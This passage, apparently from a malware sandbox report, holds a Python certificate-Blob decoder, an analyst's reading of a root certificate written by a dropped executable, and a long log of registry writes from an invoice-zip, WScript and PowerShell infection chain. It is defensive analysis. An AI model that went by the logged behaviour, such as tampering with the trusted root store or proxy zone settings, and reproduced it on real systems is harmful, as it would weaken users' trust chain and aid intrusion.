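        if tag != 0xA3:
            continue
        _, xs, xe, _ = tlv(der, s)                     # Extensions ::= SEQUENCE OF Extension
        for _x, es, ee in children(der, xs, xe):
            ext = list(children(der, es, ee))          # extnID, [critical], extnValue OCTET STRING
            if der[ext[0][1]:ext[0][2]] == b"\x55\x1d\x13":              # id-ce-basicConstraints
                _, bs, be, _ = tlv(der, ext[-1][1])    # BasicConstraints SEQUENCE inside the OCTET STRING
                is_ca = any(t == 0x01 and der[a:b] == b"\xff" for t, a, b in children(der, bs, be))
    complete = cert_end <= len(der)
    return {"serial": der[f[i][1]:f[i][2]].hex().upper(), "issuer": issuer, "subject": subject,
            "not_before": not_before, "not_after": not_after, "self_signed": issuer == subject,
            "is_ca": is_ca, "der_complete": complete,
            "computed_sha1": hashlib.sha1(der[:cert_end]).hexdigest().upper() if complete else None}


def analyse(blob_hex, key_thumbprint):
    """Decode the Blob and cross-check its stored SHA-1 property against the registry key name."""
    props, truncated = parse_blob(bytes.fromhex(blob_hex))
    info = parse_certificate(props[0x20])
    info["stored_sha1"] = props[0x03].hex().upper()
    info["sha1_matches_key_name"] = info["stored_sha1"] == key_thumbprint.upper()
    info["pubkey_bits"] = struct.unpack("<I", props[0x5C])[0]   # CERT_SUBJECT_PUB_KEY_BIT_LENGTH_PROP_ID
    info["der_complete"] = info["der_complete"] and 0x20 not in truncated
    return info


RESULT = analyse(BLOB_HEX, REGISTRY_KEY_THUMBPRINT)
```

Run against the report's value this yields a self-signed CA certificate (basicConstraints CA=TRUE), subject and issuer C=AU, ST=Some-State, L=City, O=Some Company, serial 00EE1E7E5DC92BCE32, a 2048-bit RSA key, valid from 2017-09-29 to 2020-09-28 UTC, whose stored SHA-1 equals the registry key name; der_complete is False and computed_sha1 is None because the page's copy of the Blob is truncated, so recomputing the thumbprint needs the full value exported from the guest (or certutil -store Root E02357FC7708441D4B0BE5F371F4B28961870F70 run on it). A write to the ROOT store by a freshly dropped executable is worth flagging, but it is the decoded certificate, not the registry operation, that decides whether it is an indicator: placeholder-style OpenSSL subject fields and an issue date of September 2017 are reasons to compare it with the root that the sandbox's own TLS-intercepting proxy installs before reporting it as an attacker-planted CA.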

Modification events

PID
Process
Operation
Key
Name
Value
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2856
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
LanguageList
en-US
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\Desktop\SignIQ Pty Ltd invoice 127.zip
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2856
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@C:\Windows\System32\wshext.dll,-4802
VBScript Script File
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF1600000016000000D60300000B020000
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\Desktop
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_0
4C000000730100000402000000000000D4D0C80000000000000000000000000000000000000000006E010600000000000000000039000000B402000000000000000000000000000001000000
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_1
4C000000730100000500000000000000D4D0C8000000000000000000000000000000000000000000B00105000000000000000000160000002A00000000000000000000000000000002000000
2856
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_2
4C000000730100000400000000000000D4D0C8000000000000000000000000000000000000000000B20107000000000000000000160000006400000000000000000000000000000003000000
2384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2384
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2592
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
LanguageList
en-US
2592
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2592
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2592
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2592
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1628
dVjiJafHlc.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70
1628
dVjiJafHlc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
LanguageList
en-US
1628
dVjiJafHlc.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70
Blob
0400000001000000100000001BAA5A0ECD1ED4B64DFBF621DC9044BF0F000000010000002000000061905BC048345D3815587E318FEAAE705D07527F3B5BD1B2A6AF514E29BA46525C000000010000000400000000080000030000000100000014000000E02357FC7708441D4B0BE5F371F4B28961870F70140000000100000014000000ECCD4BA46722CB4F92060701865DDF09D8AF68B41900000001000000100000000FB5FACA274B0EA933E42C34A45C2D5620000000010000006A030000308203663082024EA003020102020900EE1E7E5DC92BCE32300D06092A864886F70D01010B05003048310B30090603550406130241553113301106035504080C0A536F6D652D5374617465310D300B06035504070C044369747931153013060355040A0C0C536F6D6520436F6D70616E79301E170D3137303932393132323035305A170D3230303932383132323035305A3048310B30090603550406130241553113301106035504080C0A536F6D652D5374617465310D300B06035504070C044369747931153013060355040A0C0C536F6D6520436F6D70616E7930820122300D06092A864886F70D01010105000382010F003082010A0282010100C213E403EA7099364CC3D32AE10D85F8364F3874F86A14DAD9972751C9F548F6025F083F3F8BE947523744A631B6E409CF2CEFBC28F5C9F16ACD3C88ABE7BA7A5871A1CBF3562F7A576C3E9FAED296B5B9867651DB238499683B4E9D768FDA49C5BCA2A9928AFAF2EAD01F1FBE679E6D8ECC7BA57BB55DFA44C03A14BF11D36C7F9D654AC6B76DF9E8D83E1D238A1BCFAA22BADF071A9300CBDCC71C58846BD4ECB7F2BA7BBEF630C61B4FB01BC67E022BE89E243B0EF7F6ABBAC502A48E1DE65787B538F842E83652C365E26F2D47BFA5132215B96E2725AC3FD496BAE376D778A2C3C35D0382B89F61961BF6BA08DB4A892B4BCE3FA96FF3990C6066F1E1FF0203010001A3533051301D0603551D0E04160414ECCD4BA46722CB4F92060701865DDF09D8AF68B4301F0603551D23041830168014ECCD4BA46722CB4F92060701865DDF09D8AF68B4300F0603551D130101FF040530030101FF300D06092A864886F70D01010B0500038201010095A081FEE7794AAE6A222E01AD459EB4288CA6DCD8E1A4F5EDF609C4ACB16E19F51B543E8C75E6B833556E22641E3619EE31F26A7F5477CA8AB8F7417BFDAE076DD329D01C490D1551313F6BA132F46CAFB608C0378CBB1F1C019C573824F7758EAB50AACBE52E4D7B2EC5BD50B555CF4EC9A29892E262ED148EEC6C07F8BDD9D3BECE8402498A490A20A7F518A918065213AE11EBAC77BD1504B4E60EB2C928DA2ACE10A2B7BB7398D229D3EC6A1C2C2BE2E9C5B10C62E4012057E62598096315D01E46D8BC72E239374AB31A79CA0FE4BA94A64B3934E5C618DDB3B56089FEA4D8BAF00EC868FEE19ECCD0EA27360E690B838D3AD4DBF5BF6448F4894867E3
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPDaysSinceLastAutoMigration
2
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchLowDateTime
2055191936
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchHighDateTime
30733159
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
2355349436
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30733159
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000077000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{B81E0021-5F5A-11E9-8447-5254004AAD21}
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
3
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307040001000F0008002C002F001E00
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
3
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE
TabBandWidth
500
2136
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
LanguageList
en-US
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateLowDateTime
2372224436
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateHighDateTime
30733159
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionLowPart
2
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionHighPart
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
3614640886
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30733209
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionLow
395188356
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionHigh
268435456
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListLastUpdateTime
3666608
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VendorId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DeviceId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
SubSysId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Revision
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionHigh
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionLow
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DXFeatureLevel
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VendorId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DeviceId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-SubSysId
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-Revision
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionHigh
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionLow
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DXFeatureLevel
0
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
C067DC8D67F3D401
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionHigh
268435456
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionLow
395188356
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
StaleCompatCache
1
2136
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
StaleCompatCache
0
2912
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
CachePrefix
2912
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
CachePrefix
Cookie:
2912
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History
CachePrefix
Visited:
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000078000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{CD2CA503-5F5A-11E9-8447-5254004AAD21}
0
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
4
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307040001000F0008002D0016002E00
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
4
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
007E8D9067F3D401
2728
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE
TabBandWidth
500
2800
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
CachePrefix
2800
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
CachePrefix
Cookie:
2800
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History
CachePrefix
Visited:
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000079000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{D4A4C2F7-5F5A-11E9-8447-5254004AAD21}
0
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
5
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307040001000F0008002D002200BE02
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
5
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
01000000D08C9DDF0115D1118C7A00C04FC297EB010000002A83B6021EF2C7499630A24288AB378900000000020000000000106600000001000020000000E429C21B3DBE1926D6B38E3BE1EF3FE0CF572718AAEC95A9C31A268EFF221DC8000000000E8000000002000020000000E8982D3CE9322866C07A44B222976B021BA26CB04344D952DE49C483A331CFF4300000003C546486C1165F0D0954E66A51C146DF4FBCAA9C10D0A2A4A9E03E01336999E61028D0C06F4C537F66D91D45B09D0E4540000000EFC7C256C16CAE79DBB388D27B67271939541F99D175AA837B6A303266F95923218DA49FF362CA992DBB8356A694871631BA05C67AB6648BB1527CCF09A8EE5B
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
00A5189867F3D401
908
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE
TabBandWidth
500
2752
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
CachePrefix
2752
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
CachePrefix
Cookie:
2752
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History
CachePrefix
Visited:
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000007A000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{DC34B86F-5F5A-11E9-8447-5254004AAD21}
0
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
6
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307040001000F0008002D002F001801
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
6
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
E094B49F67F3D401
2488
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE
TabBandWidth
500
1892
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
CachePrefix
1892
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
CachePrefix
Cookie:
1892
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History
CachePrefix
Visited:
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
652
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
652
iexplore.exe
write
